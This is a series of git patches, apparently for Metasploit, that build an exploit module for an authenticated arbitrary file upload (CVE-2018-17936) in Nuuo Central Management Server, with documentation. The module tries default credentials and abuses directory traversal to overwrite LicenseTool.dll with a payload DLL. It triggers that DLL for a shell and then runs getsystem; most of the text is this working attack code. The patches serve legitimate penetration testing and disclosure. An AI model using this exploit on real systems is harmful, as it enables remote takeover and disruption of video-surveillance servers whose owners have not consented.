From 9ffff16e95a0af3cb5114a41ceb3211ad4b1b6bb Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 21 Jan 2019 17:06:10 +0700 Subject: [PATCH 01/20] Add Nuuo CMS file upload exploit --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 87 ++++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 modules/exploits/windows/nuuo/nuuo_cms_fu.rb diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb new file mode 100644 index 0000000000..52234f0b37 --- /dev/null +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -0,0 +1,87 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# The following versions were tested: +# - 1.5.2 OK +# - 2.1.0 OK +# - 2.3.2 OK +# - 2.4.0 OK +# - 2.6.0 FAIL (vuln fixed?) +# - 2.9.0 FAIL +# - 2.10.0 FAIL + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::Remote::Nuuo + + def initialize(info={}) + super(update_info(info, + 'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload", + 'Description' => %q{ + The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the + CMS Server. An example is below: + + COMMITCONFIG NUCM/1.0 + User-Session-No: + Filename: + FileType: + Content-Lenght: + + + The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) + characters. Therefore, this function can be abused to overwrite any files in the installation + drive of CMS Server. + + Note that this exploit will destroy the CMS installation - it will replace a key DLL! + This vulnerability is exploitable in CMS versions up to and including v2.4. + + This module will either use a provided session number (which can be guessed with an auxiliary + module) or attempt to login using a provided username and password - it will also try the + default credentials if nothing is provided. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'References' => + [ + [ 'CVE', '2018-17936' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ], + [ 'URL', 'FULLDISC_URL_TODO' ], + [ 'URL', 'GITHUB_URL_TODO' ] + ], + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Targets' => + [ + [ 'Nuuo Central Management Server <= v2.4.0', {} ], + ], + 'Privileged' => true, + 'DisclosureDate' => "Oct 11 2018", + 'DefaultTarget' => 0)) + end + + def exploit + login + + if @session == nil + fail_with(Failure::Unknown, "#{peer} - Failed to login to Nuuo CMS") + end + + print_status("#{peer} - Uploading payload...") + upload_file("LicenseTool.dll", generate_payload_dll) + print_status("#{peer} - Sleeping 15 seconds...") + sleep 15 + + print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") + license_data = rand_text_alpha(rand(300) + 50) + data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(rand(8) + 3)}.lic", \ + "Content-Length: " + license_data.length.to_s], license_data) + # In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL + end +end From 01e510b48f35453c7c3c17cab7f37b7d2f49d476 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 21 Jan 2019 17:30:35 +0700 Subject: [PATCH 02/20] add failure tag Co-Authored-By: pedrib --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 52234f0b37..39abab0263 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote login if @session == nil - fail_with(Failure::Unknown, "#{peer} - Failed to login to Nuuo CMS") + fail_with(Failure::NoAccess, "#{peer} - Failed to login to Nuuo CMS") end print_status("#{peer} - Uploading payload...") From 88c74fcd40c7caddff5ca69436bdd52d929ba334 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 21 Jan 2019 17:30:54 +0700 Subject: [PATCH 03/20] add https for link Co-Authored-By: pedrib --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 39abab0263..39f58e9642 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -1,5 +1,5 @@ ## -# This module requires Metasploit: http://metasploit.com/download +# This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## From 5b699768fb4ed59631a02b15247b56ce0406b3d8 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 21 Jan 2019 17:31:08 +0700 Subject: [PATCH 04/20] Add correct rand call Co-Authored-By: pedrib --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 39f58e9642..74dd1cf09d 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote sleep 15 print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") - license_data = rand_text_alpha(rand(300) + 50) + license_data = rand_text_alpha(50..350) data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(rand(8) + 3)}.lic", \ "Content-Length: " + license_data.length.to_s], license_data) # In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL From f8de99422db44555603255dff0748db2f9b28cf4 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 21 Jan 2019 17:31:23 +0700 Subject: [PATCH 05/20] Add correct rand call Co-Authored-By: pedrib --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 74dd1cf09d..9aceca8837 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") license_data = rand_text_alpha(50..350) - data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(rand(8) + 3)}.lic", \ + data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", \ "Content-Length: " + license_data.length.to_s], license_data) # In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL end From 15d4ca9070a36aef12150352eeb015a16deeff84 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 21 Jan 2019 17:33:58 +0700 Subject: [PATCH 06/20] Add CMS link and manual ranking --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 9aceca8837..85d053824c 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -13,7 +13,7 @@ # - 2.10.0 FAIL class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::Nuuo @@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'CVE', '2018-17936' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ], [ 'URL', 'FULLDISC_URL_TODO' ], - [ 'URL', 'GITHUB_URL_TODO' ] + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ] ], 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") license_data = rand_text_alpha(50..350) - data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", \ + data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", "Content-Length: " + license_data.length.to_s], license_data) # In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL end From 272121911dc7c22c48057ca0e6068b85f0148a3f Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 21 Jan 2019 17:39:47 +0700 Subject: [PATCH 07/20] Add doc file for fu exploit --- .../exploit/windows/nuuo/nuuo_cms_fu.md | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md new file mode 100644 index 0000000000..2fc7b2a7e0 --- /dev/null +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md @@ -0,0 +1,21 @@ +# Nuuo CMS Authenticated Arbitrary File Upload + +The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the CMS Server. An example is below: + +COMMITCONFIG NUCM/1.0 +User-Session-No: +Filename: +FileType: +Content-Lenght: + + +The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. + +Note that this exploit will destroy the CMS installation - it will replace a key DLL! +This vulnerability is exploitable in CMS versions up to and including v2.4. + +This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. + +## References +https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 +https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt From 100fd7b80a0fa0a0b10a41d9170abcd9106ac57a Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 21 Jan 2019 17:40:50 +0700 Subject: [PATCH 08/20] Make description shorter --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 19 +------------------ 1 file changed, 1 insertion(+), 18 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 85d053824c..b67abc253d 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -3,15 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -# The following versions were tested: -# - 1.5.2 OK -# - 2.1.0 OK -# - 2.3.2 OK -# - 2.4.0 OK -# - 2.6.0 FAIL (vuln fixed?) -# - 2.9.0 FAIL -# - 2.10.0 FAIL - class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking @@ -23,15 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload", 'Description' => %q{ The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the - CMS Server. An example is below: - - COMMITCONFIG NUCM/1.0 - User-Session-No: - Filename: - FileType: - Content-Lenght: - - + CMS Server. The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. From 66dd2d5b8b280cc92ba943583ac45b3f8565bab9 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 21 Jan 2019 17:41:07 +0700 Subject: [PATCH 09/20] Update nuuo_cms_fu.md --- .../modules/exploit/windows/nuuo/nuuo_cms_fu.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index 2fc7b2a7e0..2591952713 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md @@ -16,6 +16,16 @@ This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. + +# The following versions were tested: +# - 1.5.2 OK +# - 2.1.0 OK +# - 2.3.2 OK +# - 2.4.0 OK +# - 2.6.0 FAIL (vuln fixed?) +# - 2.9.0 FAIL +# - 2.10.0 FAIL + ## References https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt From 70b9110840c5b8cffe305f46ab9cc2335b68ef62 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 21 Jan 2019 18:13:23 +0700 Subject: [PATCH 10/20] Update nuuo_cms_fu.md --- .../modules/exploit/windows/nuuo/nuuo_cms_fu.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index 2591952713..0c6bf9c686 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md @@ -17,14 +17,14 @@ This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. -# The following versions were tested: -# - 1.5.2 OK -# - 2.1.0 OK -# - 2.3.2 OK -# - 2.4.0 OK -# - 2.6.0 FAIL (vuln fixed?) -# - 2.9.0 FAIL -# - 2.10.0 FAIL +## The following versions were tested: + - 1.5.2 OK + - 2.1.0 OK + - 2.3.2 OK + - 2.4.0 OK + - 2.6.0 FAIL (vuln fixed?) + - 2.9.0 FAIL + - 2.10.0 FAIL ## References https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 From 9a068e92215ce2fcf4a59bd2227425ad89c3498c Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 22 Jan 2019 11:57:54 +0700 Subject: [PATCH 11/20] Repair CMS installation and use getsystem --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 38 +++++++++++++++++--- 1 file changed, 34 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index b67abc253d..f3f58eea30 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -4,7 +4,7 @@ ## class MetasploitModule < Msf::Exploit::Remote - Rank = ManualRanking + Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::Nuuo @@ -19,7 +19,6 @@ class MetasploitModule < Msf::Exploit::Remote characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. - Note that this exploit will destroy the CMS installation - it will replace a key DLL! This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary @@ -49,6 +48,30 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultTarget' => 0)) end + def on_new_session(client) + if client.type == "meterpreter" + print_warning("#{peer} - Please wait a bit while we clean up") + client.sys.process.get_processes().each do |proc| + if proc['name'] == "NCS_Server.exe" + client.sys.process.kill(proc['pid']) + sleep 5 + client.shell_command_token("move /y #{@dll} LicenseTool.dll") + client.sys.process.execute("NCS_Server.exe") + print_good("#{peer} - Successfully restored LicenseTool.dll!") + end + end + + # elevate privs to system (we're already Admin anyway), and we're done! + client.run_cmd("getsystem") + print_good("#{peer} - We should have SYSTEM now, enjoy your shell!") + else + print_error("#{peer} - You are not using meterpreter, so we are unable to restore LicenseTool.dll") + print_error("#{peer} - To restore it, kill the NCS_Server.exe process and copy \\#{@dll} to \\LicenseTool.dll") + print_error("#{peer} - ... otherwise the Nuuo CMS installation will be nuked!") + print_good("#{peer} - Anyway, enjoy your shell!") + end + end + def exploit login @@ -56,15 +79,22 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Failed to login to Nuuo CMS") end + # Download and upload a backup of LicenseTool.dll, so that we can restore it at post + # and not nuke the CMS installation. + @dll = rand_text_alpha(12) + print_status("#{peer} - Backing up LicenseTool.dll to #{@dll}") + dll_data = download_file("LicenseTool.dll") + upload_file(@dll, dll_data) + print_status("#{peer} - Uploading payload...") upload_file("LicenseTool.dll", generate_payload_dll) + print_status("#{peer} - Sleeping 15 seconds...") sleep 15 print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") license_data = rand_text_alpha(50..350) - data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", + send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", "Content-Length: " + license_data.length.to_s], license_data) - # In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL end end From af9d7727adc3fc76801828536fc2f5a12452b84d Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 22 Jan 2019 11:59:57 +0700 Subject: [PATCH 12/20] Remove warning about destroying install --- documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md | 1 - 1 file changed, 1 deletion(-) diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index 0c6bf9c686..9ef8afed95 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md @@ -11,7 +11,6 @@ Content-Lenght: The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. -Note that this exploit will destroy the CMS installation - it will replace a key DLL! This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. From 0685ebed76c8df88bae3212a92672cb99f479a5a Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 22 Jan 2019 12:08:41 +0700 Subject: [PATCH 13/20] Remove peer as that is not needed --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 24 ++++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index f3f58eea30..e359ed7a63 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -50,25 +50,25 @@ class MetasploitModule < Msf::Exploit::Remote def on_new_session(client) if client.type == "meterpreter" - print_warning("#{peer} - Please wait a bit while we clean up") + print_warning("Please wait a bit while we clean up") client.sys.process.get_processes().each do |proc| if proc['name'] == "NCS_Server.exe" client.sys.process.kill(proc['pid']) sleep 5 client.shell_command_token("move /y #{@dll} LicenseTool.dll") client.sys.process.execute("NCS_Server.exe") - print_good("#{peer} - Successfully restored LicenseTool.dll!") + print_good("Successfully restored LicenseTool.dll!") end end # elevate privs to system (we're already Admin anyway), and we're done! client.run_cmd("getsystem") - print_good("#{peer} - We should have SYSTEM now, enjoy your shell!") + print_good("We should have SYSTEM now, enjoy your shell!") else - print_error("#{peer} - You are not using meterpreter, so we are unable to restore LicenseTool.dll") - print_error("#{peer} - To restore it, kill the NCS_Server.exe process and copy \\#{@dll} to \\LicenseTool.dll") - print_error("#{peer} - ... otherwise the Nuuo CMS installation will be nuked!") - print_good("#{peer} - Anyway, enjoy your shell!") + print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll") + print_error("To restore it, kill the NCS_Server.exe process and copy \\#{@dll} to \\LicenseTool.dll") + print_error("... otherwise the Nuuo CMS installation will be nuked!") + print_good("Anyway, enjoy your shell!") end end @@ -76,23 +76,23 @@ class MetasploitModule < Msf::Exploit::Remote login if @session == nil - fail_with(Failure::NoAccess, "#{peer} - Failed to login to Nuuo CMS") + fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS") end # Download and upload a backup of LicenseTool.dll, so that we can restore it at post # and not nuke the CMS installation. @dll = rand_text_alpha(12) - print_status("#{peer} - Backing up LicenseTool.dll to #{@dll}") + print_status("Backing up LicenseTool.dll to #{@dll}") dll_data = download_file("LicenseTool.dll") upload_file(@dll, dll_data) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") upload_file("LicenseTool.dll", generate_payload_dll) - print_status("#{peer} - Sleeping 15 seconds...") + print_status("Sleeping 15 seconds...") sleep 15 - print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") + print_status("Sending SENDLICFILE request, shell incoming!") license_data = rand_text_alpha(50..350) send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", "Content-Length: " + license_data.length.to_s], license_data) From 4e1d79ac4be1d4ea953b54dbb6b8622b9122e4fe Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 22 Jan 2019 12:45:47 +0700 Subject: [PATCH 14/20] Update nuuo_cms_fu.rb --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 26 ++++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index e359ed7a63..951776d171 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload", 'Description' => %q{ The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the - CMS Server. + CMS Server. The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. @@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote def on_new_session(client) if client.type == "meterpreter" - print_warning("Please wait a bit while we clean up") + print_warning("Please wait a bit while we clean up") client.sys.process.get_processes().each do |proc| if proc['name'] == "NCS_Server.exe" client.sys.process.kill(proc['pid']) @@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote print_good("Successfully restored LicenseTool.dll!") end end - + # elevate privs to system (we're already Admin anyway), and we're done! client.run_cmd("getsystem") print_good("We should have SYSTEM now, enjoy your shell!") @@ -71,30 +71,30 @@ class MetasploitModule < Msf::Exploit::Remote print_good("Anyway, enjoy your shell!") end end - - def exploit - login - if @session == nil + def exploit + nucs_login + + if @nucs_session == nil fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS") end - # Download and upload a backup of LicenseTool.dll, so that we can restore it at post + # Download and upload a backup of LicenseTool.dll, so that we can restore it at post # and not nuke the CMS installation. @dll = rand_text_alpha(12) print_status("Backing up LicenseTool.dll to #{@dll}") - dll_data = download_file("LicenseTool.dll") - upload_file(@dll, dll_data) - + dll_data = nucs_download_file("LicenseTool.dll") + nucs_upload_file(@dll, dll_data) + print_status("Uploading payload...") - upload_file("LicenseTool.dll", generate_payload_dll) + nucs_upload_file("LicenseTool.dll", generate_payload_dll) print_status("Sleeping 15 seconds...") sleep 15 print_status("Sending SENDLICFILE request, shell incoming!") license_data = rand_text_alpha(50..350) - send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", + nucs_send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", "Content-Length: " + license_data.length.to_s], license_data) end end From fbde697e3f620f744116a64148ab331d5321c625 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 22 Jan 2019 18:57:02 +0700 Subject: [PATCH 15/20] Update nuuo_cms_fu.rb --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 951776d171..b85d01b9c0 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -4,7 +4,7 @@ ## class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::Nuuo From 2bf663cf7d336a8d2b6cbd0c87c15c3be8b3b43a Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Thu, 24 Jan 2019 21:59:45 +0700 Subject: [PATCH 16/20] Add full disclosure URL --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index b85d01b9c0..91f8922d15 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote [ [ 'CVE', '2018-17936' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ], - [ 'URL', 'FULLDISC_URL_TODO' ], + [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ] ], 'Platform' => 'win', From 9070435603e4a2d8f9d6500ebaec12dfd7b2dc9d Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Wed, 30 Jan 2019 21:32:33 +0700 Subject: [PATCH 17/20] Change to support the new nuuo lib --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 91f8922d15..c9b992198f 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending SENDLICFILE request, shell incoming!") license_data = rand_text_alpha(50..350) - nucs_send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", + nucs_send_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", "Content-Length: " + license_data.length.to_s], license_data) end end From 2b714108075d178f54444e66ece8736a46314162 Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 19 Feb 2019 05:48:54 -0600 Subject: [PATCH 18/20] Minor updates exploit:nuuo_cms_fu --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 48 +++++++++++--------- 1 file changed, 26 insertions(+), 22 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index c9b992198f..cc41127759 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -24,6 +24,10 @@ class MetasploitModule < Msf::Exploit::Remote This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. + + This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module + fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will + not execute successfully. }, 'License' => MSF_LICENSE, 'Author' => @@ -44,57 +48,57 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Nuuo Central Management Server <= v2.4.0', {} ], ], 'Privileged' => true, - 'DisclosureDate' => "Oct 11 2018", + 'DisclosureDate' => 'Oct 11 2018', 'DefaultTarget' => 0)) end def on_new_session(client) - if client.type == "meterpreter" - print_warning("Please wait a bit while we clean up") + if client.type == 'meterpreter' + print_warning('Please wait a bit while we clean up') client.sys.process.get_processes().each do |proc| - if proc['name'] == "NCS_Server.exe" + if proc['name'] == 'NCS_Server.exe' client.sys.process.kill(proc['pid']) - sleep 5 + Rex.sleep(5) client.shell_command_token("move /y #{@dll} LicenseTool.dll") - client.sys.process.execute("NCS_Server.exe") - print_good("Successfully restored LicenseTool.dll!") + client.sys.process.execute('NCS_Server.exe') + print_good('Successfully restored LicenseTool.dll!') end end # elevate privs to system (we're already Admin anyway), and we're done! - client.run_cmd("getsystem") - print_good("We should have SYSTEM now, enjoy your shell!") + client.run_cmd('getsystem') + print_good('We should have SYSTEM now, enjoy your shell!') else - print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll") + print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll') print_error("To restore it, kill the NCS_Server.exe process and copy \\#{@dll} to \\LicenseTool.dll") - print_error("... otherwise the Nuuo CMS installation will be nuked!") - print_good("Anyway, enjoy your shell!") + print_error('... otherwise the Nuuo CMS installation will be nuked!') + print_good('Anyway, enjoy your shell!') end end def exploit nucs_login - if @nucs_session == nil - fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS") + unless @nucs_session + fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') end # 